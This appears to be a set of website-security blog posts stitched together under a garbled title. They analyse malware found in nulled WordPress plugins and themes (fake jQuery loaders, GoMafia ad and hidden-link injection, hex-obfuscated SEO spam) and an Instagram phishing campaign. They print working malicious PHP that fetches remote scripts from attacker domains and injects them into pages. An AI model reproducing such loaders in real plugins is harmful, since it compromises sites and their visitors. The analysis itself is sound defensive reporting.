Stop Using SEO Spam Links in Nulled Plugins Worthless

Stop Using SEO Spam Links in Nulled Plugins Worthless : It’s not unusual to see website owners running things on a budget. Choosing a safe and reliable hosting company, buying a nice domain name, boosting posts on social media, and ranking on search engines — all this costs a lot of money. At the end of the day, some site owners may even choose to cut expenses by installing pirated (or nulled) software on their websites.

Fake jQuery Scripts in Nulled WordPress Plugins

We recently investigated some random redirects on a WordPress website that would only happen to certain visitors. Traffic analysis showed us that it was not a server-side redirect, rather it happened due to some script loaded by the web pages.

A quick look through the HTML code revealed this script:

Fake jQuery script injection
Fake jQuery script injection
It was very suspicious for a few reasons:

www . wpquery . org/jquery.js — it’s definitely not a real jQuery domain and WordPress comes with prepackaged version of jquery.js so there’s no need to link to it on some third party site.

The script inclusion is random. It only happens if the current time value (in milliseconds) is even:
if (now%2 == 0)
It includes either jquery.min.js or jquery.js based on whether the current request has a referrer or not. That just doesn’t make sense.
Wp_func_jquery Function
This script was placed in the section between other scripts, so it was most likely injected by a wp_head hook in a theme or plugin. A quick search revealed the Ultimate_VC_Addons plugin that contained this code:

if(!function_exists(‘wp_func_jquery’)) {
function wp_func_jquery() {
$host = ‘https://’;
$library = ‘/jquery-1.6.3.min.js’;
echo(wp_remote_retrieve_body(wp_remote_get($host.’jquery’.’libs .org’.$library)));
}
if(rand(1,2) == 1) {
add_action(‘wp_footer’, ‘wp_func_jquery’);
}
else {
add_action(‘wp_head’, ‘wp_func_jquery’);
}
}
As you can see, this wp_func_jquery function tries to highlight benign strings such as “jquery-1.6.3.min.js“, “jquery“, “libs.org” and make it less obvious that it injects the content from hxxp:// jquerylibs . org/jquery-1.6.3.min.js into web pages. Moreover, you can see that this function is used randomly either in the header or footer of WordPress pages.

When I checked that hxxp:// jquerylibs . org/jquery-1.6.3.min.js URL, I found the www . wpquery . org script that you see at the top of this post. Bingo!

Fake jQuery Domains
Further analysis showed that wpquery .org and jquerylibs.org are not the only fake jQuery domains used in this attack. We identified the following 8 malicious domains on 2 servers.

On 176 .9 .91 .14 (Germany Nuremberg Hetzner Online Ag)

jquerylibs . org — Created on June 2, 2014
uijquery . org — Created on July 10, 2014
ujquery . org — Created on November 5, 2014
cjquery . org — Created on January 16, 2015
ejquery . org — Created on February 28, 2015
On 62 .210 .149 .60 (France Paris Online S.a.s.)

wpstat . org — Created on 2015-04-05
wplibs . org — Created on 2015-04-05
wpquery . org — Created on 2015-04-05
Malware Evolution
In this section we will show you how the attack evolved over time.

Initially the attackers used the same domains both in the PHP code and in the injected JS code. The earlier versions of the malicious script looked like this:

They continued to introduce new fake jQuery domains every few months when they began experiencing problems (e.g. blacklists) with their current domains.

Then, in April, they changed their tactics, and decided to reuse old domain in the PHP code (which is not publicly visible) but created a few new fake domains on another server for the publicly visible JS injection.

You can also see how it evolved by the way they obfuscated those domains in the PHP code:

//direct call with string concatenation …
echo(wp_remote_retrieve_body(wp_remote_get($host.’ui’.’jquery.org/jquery-1.6.3.min.js’)));

//checking headers first…
$jquery = $host.’u’.’jquery.org/jquery-1.6.3.min.js’;
$headers = get_headers($jquery, 0);
if ($headers[0] == ‘HTTP/1.1 200 OK’){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}

//It’s not always jquery-1.6.3.min.js, on on cjquery . org it is jquery-ui.js
$jquery = $host.’c’.’jquery.org/jquery-ui.js’;

//using the library var in concatenation…
$host = ‘https://’;
$library = ‘/jquery-1.6.3.min.js’;
echo(wp_remote_retrieve_body(wp_remote_get($host.’jquery’.’libs.org’.$library)));
With time, they also added some randomness to both the PHP code and the JS to make it harder to detect the script. Initially, they only injected the script in the footer sections, but in more recent versions, it can be either in the header or in the footer:

if(rand(1,2) == 1) {
add_action(‘wp_footer’, ‘wp_func_jquery’);
}
else {
add_action(‘wp_head’, ‘wp_func_jquery’);
}
And the remote script is now injected with the 50% probability.

var now = new Date().getTime(); if (now%2 == 0) {
… remote script injection here …
}
Redirections
If you try to open the malicious scripts in your browser, many of you will not see anything, but it doesn’t mean they are benign. The headers of the .js responses show that they are being served by PHP engine rather than as a static content, so their content may change at any moment for the users they are really interested in. At this time, we know that the scripts may redirect some visitors to hxxp: / / lock . page-request . com/mobile/m.html, which redirects desktop users further to hxxp://online-news . us/work-from-home-report/ and mobile users to URLs like these:

hxxp:/ /link .clickdirected .com/tracking202/redirect/dl.php?t202id=553&t202kw=
hxxp:/ /bangkokboy .791 .a .clickbetter .com
Infection Vector
In all cases we see the malicious code is injected into legitimate premium plugins and themes that are then distributed on untrustworthy sites. If you Google the phrase [wp_func_jquery], you’ll find a few forum threads where people find this malicious code inside the so-called “nulled” packages of various plugins. This infection vector is quite popular in the WordPress world and we have blogged about the threats of using pirated software on your websites before.

Most specialized websites that offer “nulled” software exist because they inject backdoors, malware and black-hat SEO spam into the pirated software they offer. This is not a WordPress specific problem. The same applies to “nulled” extensions, templates, etc. for Joomla!, Drupal and other CMS. We recommend reading a great write-up (by Fox-IT) of the CryptoPHP malware whose main distribution channel is “nulled” plugins and extensions.

This is just another warning to website owners to stay away from third-party software that comes from shady sources.

Nulled WordPress Themes: Malvertising and Black Hat SEO

If you have been following our blog for some time, you know that we regularly warn about risks associated with the use of third-party software on your site. A benign plugin may sneakingly inject ads into your site which cause malvertising problems for the site visitors (e.g. SweetCaptcha). Other plugins may be hijacked by hackers or black hat freelancers too (remember the epic story of Wooranker?). Another common issue is the use of so-called “nulled” premium themes and plugins that usually come with backdoors, hidden links, unwanted ads and even pure malware (e.g CryptoPHP or fake jquery scripts).

This time I’ll tell you one more story that combines all the above mentioned problems: nulled plugins, black hat SEO, malvertising, and a software development company that turned to the dark side.

Suspicious gma_footer Code
Recently the lead of our remediation team, Bruno Zanelato, cleaned a site and found this piece of code in one premium WordPress plugin:

Suspicious gma_footer code
Suspicious gma_footer code
The encrypted part decodes to hxxp://cdn .gomafia[.]com. As you might expect, he investigated what’s going on there.

That gma_footer function was hooked to the wp_footer action. As a result, the code fetched from cdn.gomafia[.]com was injected into the footer of every site page. So what exactly is being injected?

Injected cdn.gomafia code
Injected cdn.gomafia code
The injected code vary by using different keywords or sets of ad script, but you can always see these three main parts:

Ad scripts from eclkmpsa[.]com/adServe/banners?tid=131711_225710_0&tagid=2, www .tradeadexchange[.]com/a/display.php?r=1219598 and cdn.popcash[.]net/pop.js
Invisible spammy links that at the moment point to gomafia[.]com and some other Indian sites (including one porn site)
Google Analytics code with the UA-5133396-16 id

Malvertising
Running someone else’s ads on your site is probably not what you expect when you install a plugin. The thing is, you might not even see them when you browse your own site. These particular scripts are configured to show popups only when visitors spend some time on a site and perform some action there. For example, scroll the page or click something.

The ads they show in popups are of quite questionable quality – gambling, scams, and even malicious downloads like this:

Fake HD Video Player
Fake HD Video Player
The downloaded HDVideoPlayer_2403439173.exe was detected as malicious by 13 antivirus products.

Hidden Links
Following the ad scripts, you can see a block of spammy links that point to gomafia[.]com and three more sites. The links are not visible on infected web pages because of this tag:

The GMA style is not defined in the injected HTML part, so how does it work? Let’s get back to the PHP code we found in the plugin. In addition to the gma_footer, it also defines this gma_styles function (used in the wp_enqueue_scripts hook):

function gma_styles () {
wp_enqueue_style( ‘gomafia’, plugin_dir_url(FILE) .’gma.css’);
}

We can see how this code makes WordPress include the gma.css stylesheet file from the plugin’s directory on every page. And here’s the content of that file:

.GMA { display: none; }

Now it’s clear what makes the links invisible.

Google Analytics
In addition to ads and spammy links, the malware injects a Google Analytics code with the UA-5133396-16 user ID to every infected web page (it is possible to use multiple tracking codes on the same web page). It allows the spammers to track their campaign. This may help see the overall page views with their injected ads across all the infected sites.

Google Analytics tracking code may also help verify themselves as the owners of the infected sites in Google Search Console. We have no information whether the attackers actually tried to do it but we can’t discard this possibility since some other black hat SEO attacks did verify themselves as owners of the infected sites in the Search Console.

What GoMafia Anyway?
When we found the malicious code in the plugin, the first question was whether it was a part of the real plugin or injected by hackers. Since it was a premium plugin, it was hard to obtain its original source code. Moreover, premium plugins rarely (if ever) resort to such tricks — their developers monetize their work directly by selling their plugins.

The answer to the question about the origin of the malicious code became obvious when we opened the GoMafia[.]com site. This site is a collection of “nulled” premium themes and plugins, mainly from CodeCanyon.

To verify our hypothesis, we downloaded a few themes and plugins from that site. All of them contained the gma_footer code that injected the content of the hxxp://cdn.gomafia[.]com page into web pages of sites that install them.

It’s worth adding that the GoMafia[.]com site also uses the same ad scripts that create annoying (and usually malicious) popups and popunders. Moreover, their download links use adf[.]ly interstitial pages that show ads before redirecting to the actual download page. This service shares ad revenue with users who send traffic to their interstitial pages. Not only are such pages annoying, but a significant share of their ads consist of pure scams and malware downloads. For example, the first time I clicked on the adf[.]ly link my browser began downloading the fasttorrent.exe file (Detection ratio: 20 / 56 on Virustotal).

Digging Deeper
If we dig a bit deeper, we can reveal some other interesting details about the people behind this GoMafia black hat campaign.

WHOIS records show that the gomafia[.]com domain was registered just a couple of months ago on March 8, 2016 by Viji Sathish from Tamil Nadu state in India. If we check WHOIS data for the other three domains that we see in the block of spammy links, we’ll notice that they all have absolutely the same registration address, but registered by “Sathishkumar M“.

The oldest one (metaskapes[.]com) was registered back in 2009 and the newest one (coupontwit[.]com) was registered just two months ago. So despite the fact that the four sites in the spammy link block look different at first glance (nulled software, interior design, coupons and porn) they all belong to the same people and GoMafia injects that block of links to third-party websites to promote their own resources, not third-party sites.

Let’s see what else is common between these four sites.

They all use the same ID for Google Analytics: UA-5133396-x (where x changes from site to site), which also proves that they are all controlled by the same people.

One more piece of the puzzle can be found if you check the email addresses specified in the WHOIS data. All the emails are different (sathish.5566(at)gmail .com, sathish(at)kenzest .com, viji(at)kenzest .com), but they show us that:

Sathishkumar M and Viji Sathish is probably the same person.
He has something to do with kenzest[.]com site, since he has two different accounts on that private domain.
Moreover, kenzest[.]com and coupontwit[.]com (one of the spammy links) are hosted on the same server 192 .185 .21 .192. The rest of the sites (including gomafia[.]com) are behind the CloudFlare firewall so it’s hard to tell their real IPs. But if we change the IP address of gomafia[.]com to 192 .185 .21 .192 in our /etc/hosts file, we’ll see that the GoMafia site is also hosted on the same server as kenzest[.]com.

Kenzest .Com
Kenzest[.]com is a site of an Indian company that describes itself as a “group of Computer Engineers who have learned to provide solutions that work, to our customers“.

On the contact page we find the same address and phone number as in the gomafia[.]com whois record. Moreover, it says that the phone number belongs to Sathish! With a bit of Googling we can even find that Sathish Kumar M of Kenzest. Here’s his article and photo back from 2010. Apparently back then, Sathish still tried to find good application to his software development skills.

Most likely their white hat business wasn’t that successful and they eventually began to explore the dark side of the Internet Marketing: porn, intrusive ads, black hat SEO, software piracy and abuse of third-party sites.

dark-side

In addition to software development, Kenzest Technologies also provides SEO services. This is a quote from their site:

Our keyword research team at Kenzest specializes in SEO. Our SEO services makes the site highly superior to all other 24,930,000,000 .coms found on the internet.

I gather, GoMafia[.]com is just a part of their SEO strategy:

Have as many sites as possible install their nulled plugins.
As a proof-of-concept, inject links to their own sites and track their progress in search results.
Once they reach a certain level on infected sites and find paying clients interested in their SEO services, they can replaces their own links with their client links. It’s easy – all they need to do is change the contents of their own cdn.gomafia[.]com page.
Meanwhile, they are trying to monetize their GoMafia project with ads (intrusive and usually malicious): on their sites, in download links, and on the sites they infect.

Given the decisions they have made so far, they can easily replace the hidden links and ads on cdn.gomafia[.]com with more dangerous types of malware if they figure out how to monetize it. Or, they will put backdoors and malware directly in the nulled plugins like many other similar sites do.

“Free” vs Free
This story once again demonstrates to us why it’s always a bad idea to install “free” premium software on your website and what makes people offer such “nulled” themes and plugins for “free”. It’s just a criminal business model where instead of paying directly to the software developers, you are paying to criminals by giving them a chance to abuse your site and your site visitors.

Actually, every third-party component that you install on your site can potentially cause security issues such as backdoors, malware, spam, or just vulnerabilities that can be exploited by hackers. Whenever you install something, you should ask yourself these questions:

Does my site really need this software?

Can I trust the developer?
Can I trust the source where I obtained this software from?
Will I be able to get timely security updates in case of found vulnerabilities?
To minimize risks, use popular free software from official repositories like Plugin Directory or Theme Directory. Every day, many people download and test software there. Any security problems are being revealed quite fast. Another option is to purchase premium software directly from their developers, or official distributors. This way you support the developers and ensure that you get the original software that wasn’t tampered with.

Fake Instagram Verification

Across various social media platforms there are verification checkmark symbols that appear near the name of the account’s page we view. For example, this verified account indicator seen from our Twitter page:

These verification checkmarks exist as a credibility indicator to help show authenticity and integrity to social media page visitors.

In order to obtain these checkmark symbols, page owners must meet a list of various requirements and undergo a verification process with their social media provider.

The Quest for Instagram Verification Checkmarks
These strong requirements also lead to a sort of exclusivity around the verification checkmark.

Reportedly only 1% of Instagram users have undergone the verification process. Instagram’s explosion in popularity, along with the exclusivity of the verification checkmark, has led to verification being highly desirable for many users, though this sentiment exists on other social media platforms like Twitter.

I want to be verified on Instagram. I crave that blue check next to my name. Why? Basically because none of my friends are verified, so the verification will prove I’m better than them; which I always suspected.

– A joke by the writer, which showcases the desire many users have for being verified

While the majority of users may want the verification symbol for bragging rights, having the symbol can also help monetize a social media page. This is driving some users to pursue any way possible to obtain the coveted verification checkmark for their profiles.

A Phishing Campaign for Instagram Users
When combined, all of these factors can lead someone to ignore the warning signs and fall victim to phishing attempts. We recently came across this page, which masquerades as a real Instagram Verification submission page:

Verified Instagram Phishing Page

After clicking Apply Now, it begins a series of phishing forms on the phishing domain instagramforbusiness[.]info. This form targets the victim’s Instagram login information and then asks them to confirm their email address…by asking for their email address and password credentials.

Instagram Email Confirmation Phishing

After submitting each form, the login information is sent via email to the hackers. This provides them with unauthorized access to the victim’s social media page. Instagram employs fingerprinting and a variety of other methods to determine suspicious account logins. If detected, they lock down the account with a “Suspicious Login Attempt” warning.

In order to avoid this account lockdown, attackers need one of two things: access to the phone number used to register the account (if applicable as Instagram doesn’t require a phone number for signup) or access to the email address associated with the profile.

This explains why hackers also target associated email login information on this phishing page. It allows them to reset and verify ownership of the phished Instagram account should the “Suspicious Login Attempt” warning be triggered.

Looking for Signs of a Phishing Campaign
Don’t let your situational awareness be lowered by the promise of an exclusive item or status. There were a number of clear signs that this page was malicious:

The domain name is clearly not instagram.com.
A lack of HTTPS results in insecure warnings in visitor’s browsers. Large websites like Instagram typically display HTTPS, especially when handling login information and other sensitive information.
Instagram will never ask for a linked email account’s password as confirmation. It will use the standard method of sending an email with a verification link for you to click.
Conclusion
The lure of a social media verification checkmark symbol works great to entice unsuspecting victims. This is similar to the lure of “free” (i.e nulled, cracked) products, like premium WordPress plugins or themes.

As a rule of thumb, you should always verify the links you are clicking on and ensure that you are only submitting personal information on legitimate websites. Malicious users are actively looking for a chance to deceive their victims with phishing campaigns. If you are looking for a website security solution, we will be happy to help you.

Unfortunately, as discussed in some of our earlier posts about free software and fake verification, these “free” components may still come with a hefty price tag. The same people who remove the plugin’s or theme’s license checks may have also added some other form of monetization — and most times, the end result is not desirable.

Injection in Smart Grid Gallery Plugin
This time, we identified malicious code injected within the Smart Grid Gallery plugin. The malicious code, which was found injected into the SmartGridGalleryClass.php file, didn’t even try to be discreet.

Seen below, the injection consisted of two long hex encoded strings and an ironic sorry_function.

if( ! function_exists(‘sorry_function’)){
function sorry_function($content) {
if (is_user_logged_in()){return $content;} else {if(is_page()||is_single()){
$vNd25 = “\74\144\151\x76\40\163\x74\x79\154\145\x3d\42\x70\157\x73\151\164\x69\x6f\x6e\72\141\x62\x73\x6f\154\165\164\145\73\164\157\160\x3a\60\73\154\145\146\x74\72\55\71\71\x39\71\x70\170\73\42\x3e\x57\x61\x6e\x74\40\x63\162\145\x61\x74\x65\40\163\151\164\x65\x3f\x20\x46\x69\x6e\x64\40\x3c\x61\x20\x68\x72\145\146\75\x22\x68\x74\164\x70\72\x2f\57\x64\x6c\x77\x6f\162\144\x70\x72\x65\163\163\x2e\x63\x6f\x6d\57\42\76\x46\x72\145\145\40\x57\x6f\x72\x64\x50\162\x65\163\x73\x20\124\x68\x65\155\145\x73\x3c\57\x61\76\40\x61\x6e\144\x20\x70\x6c\165\147\x69\156\x73\x2e\x3c\57\144\151\166\76”;
$zoyBE = “\74\x64\x69\x76\x20\x73\x74\171\154\145\x3d\x22\x70\157\163\x69\x74\x69\x6f\156\x3a\141\142\163\x6f\154\x75\164\x65\x3b\x74\157\160\72\x30\73\x6c\x65\x66\164\72\x2d\x39\71\71\x39\x70\x78\73\42\x3e\104\x69\x64\x20\x79\x6f\165\40\x66\x69\156\x64\40\141\x70\153\40\146\157\162\x20\x61\156\144\162\x6f\151\144\77\40\x59\x6f\x75\x20\x63\x61\156\x20\146\x69\x6e\x64\40\156\145\167\40\74\141\40\150\162\145\146\x3d\x22\150\x74\x74\160\163\72\57\x2f\x64\154\x61\156\x64\x72\157\151\x64\62\x34\56\x63\x6f\155\x2f\42\x3e\x46\x72\145\x65\40\x41\x6e\x64\x72\157\151\144\40\107\141\x6d\145\x73\74\x2f\x61\76\40\x61\156\x64\x20\x61\160\x70\163\x2e\74\x2f\x64\x69\x76\76”;
$fullcontent = $vNd25 . $content . $zoyBE; } else { $fullcontent = $content; } return $fullcontent; }}
add_filter(‘the_content’, ‘sorry_function’);}
Hidden Divs Boost SEO Rankings
Once decoded, the real intention becomes apparent. It adds a hidden div which links to other two websites — probably related to the same person who nulled the plugin — in an attempt to increase their SEO rankings:

<?php
if (!function_exists(‘sorry_function’))
{
function sorry_function($content)
{
if (is_user_logged_in())
{
return $content;
}
else
{
if (is_page() || is_single())
{
$vNd25 = ‘”Want create site? Find Free WordPress Themes and plugins.”‘;
$zoyBE = ‘”Did you find apk for android? You can find new>Free Android Games and apps.”‘;
Evasive Maneuvers & Sources
This injection leverages a WordPress function called add_filter which “allows plugins to modify various types of internal data at runtime.”

In this case, the malicious code combines the site’s valid content with two hidden divs. To avoid detection, specific conditions must be met to add the divs to the site: When there are no users are logged in to the website, only then can the malicious injection be added into pages or posts.

Upon further investigation, we identified that the installed plugin was a nulled version and had been downloaded from the free themes website hxxps://www[.]downloadfreethemes[.]co/smart-grid-gallery-v1-4-0-responsive-wordpress-gallery-plugin/. We were able to download the same plugin with the same injection, however, there is no reference to this site in the code.

Now, regarding the websites referenced in the malicious injection — dlwordpress[.]com and dlandroid24[.]com — were clearly fake sites used to increase SEO rankings and make money on referral programs for other websites. Using PublicWWW during the writing of this article, dlwordpress was injected on 7,040 sites and dlandroid24 was found on 6,262 sites. Using Majestic we found dlwordpress on 5,000 sites, which is the limit for our account there.

In conclusion, site owners should always avoid installing nulled themes/plugins from any source. A large majority of nulled software contains malicious backdoors or SEO spam injections, which can pose serious security risks to your website’s visitors and environment. You can also audit existing plugins to make sure any nulled software has not been installed on the WordPress environment.

Update: As of Jan 5, 2021, the website dlwordpress[.]com has switched owners and no longer seems to be involved in the Blackhat SEO campaign. It is important to note that Blackhat SEO campaigns can have long-lasting impacts for webmasters, since many sites still send unauthorized backlinks to the domain.